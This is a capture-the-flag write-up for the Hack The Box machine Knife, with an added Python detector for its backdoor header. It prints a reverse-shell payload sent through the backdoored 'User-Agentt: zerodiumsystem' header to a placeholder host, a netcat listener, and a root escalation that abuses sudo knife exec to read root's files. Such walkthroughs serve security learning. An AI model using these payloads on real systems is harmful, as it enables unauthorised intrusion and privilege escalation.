Knife — Hack The Box
Hey guys, today I'm going to solve Knife, a vulnerable machine from Hack The Box. This machine is a beginner-friendly box and I recommend you guys pwn it. The box is relatively easy for anyone who is a beginner in penetration testing or cybersecurity. Without wasting your time (and mine), let's go…
Our first task is to run an Nmap scan on the target IP:
And we get 2 open ports. Since HTTP has a bigger attack surface, I'll start by enumerating it…
Opening the webpage using Mozilla we get a standard webpage…
Before doing any further enumeration I always take a look at the source code of the webpage; sometimes developers leave comments behind that might be helpful in exploiting the box. (Just press Ctrl+U and it will open the source code in another tab.)
But we didn't find any comment left by the developer…
After wasting a few minutes on directory bruteforcing the website with gobuster and scanning it with nikto, I didn't find anything useful…
But then I thought to intercept the web request using Burp Suite, and I found that the website is vulnerable to Remote Code Execution (RCE)…
And we can see that the website is really vulnerable to RCE…
So let's spawn a reverse shell without wasting time:
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
Listen for your shell using the command:
nc -lvnp 1234
After a few seconds you'll get a shell…
Let's hunt for user.txt; it is in the home directory of the user james, i.e. /home/james…
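As an added defender-side example (not part of the original write-up), a small detector that flags requests carrying the misspelled User-Agentt header with the zerodium prefix shown above; the sample requests and the target.example host name are constructed.

```python
from typing import Dict, List

# Constructed sample requests (not captured traffic). The second and third carry
# the misspelled "User-Agentt" header with the "zerodium" prefix from the
# write-up; the host name is a placeholder.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target.example\r\n"
    "User-Agentt: zerodiumsystem(\"...\");\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: target.example\r\n"
    "user-agentt:   ZERODIUMsystem(\"...\");\r\n\r\n",
]


def parse_headers(raw_request: str) -> Dict[str, List[str]]:
    """Return {lowercased-header-name: [values]} from a raw HTTP request head."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue  # malformed header line; ignore rather than crash
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def is_backdoor_trigger(raw_request: str) -> bool:
    """True when any User-Agentt value starts with 'zerodium' (case-insensitive)."""
    for value in parse_headers(raw_request).get("user-agentt", []):
        if value.lower().startswith("zerodium"):
            return True
    return False


def flagged_indexes(requests: List[str]) -> List[int]:
    """Indexes of requests a WAF rule or log review should block or alert on."""
    return [i for i, req in enumerate(requests) if is_backdoor_trigger(req)]


if __name__ == "__main__":
    print(flagged_indexes(SAMPLE_REQUESTS))  # [1, 2]
```

A normal User-Agent header never matches, so the check can run over proxy or web-server logs that record full request headers without noise.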
user.txt : f2485ba651c56e09f2f80c9f72909e55
It's time to hunt for root.txt, the root flag…
So let's check which sudo commands the user james can run:
So poor: james can only run the command /usr/bin/knife as the superuser, without a password…
After a few minutes of hunting I found that it can execute Ruby scripts…
You can see that there's a command "knife exec [SCRIPT] (options)" which can execute scripts…
Our next step is to create a Ruby script and execute it via knife using the command mentioned above…
For this I took help from my friends…
They suggested a script which I can execute in order to directly get root.txt, the root flag…
Create a file using nano or any editor of your choice and write the following…
# Read /root/root.txt line by line; knife exec runs this Ruby as root via sudo
f = File.open("/root/root.txt", "r")
f.each_line do |line|
  puts line
end
f.close
Save it with the '.rb' extension and send it to your victim machine; in my case I saved it as root.rb…
You can follow the steps mentioned below to send the file…
To send the file / script I used Python's SimpleHTTPServer…
python -m SimpleHTTPServer 80
And to receive the file / script on my victim machine I used wget…
wget 'your_ip:port/file'
Now it's time to execute the script, so let's go…
Command to execute the script:
/usr/bin/knife exec root.rb
Hooray!! We got root.txt, the root flag; you can see it in the second last line…
root.txt : 73c3dc81e8991d7612c3fe8b8fe5f159
Warning!!!! I think the root flag changes after some time, so if you directly enter the root flag there is a higher chance of getting an error. So simply follow the instructions mentioned above and get your flags…
Thanks!!
Note: There's a difference in date & time because, as I already told you, I didn't get enough time, but to help you guys in pwning the machine, somehow I managed the time.
Again thanks for reading.
For any queries, dm me on Instagram @ig._.anshu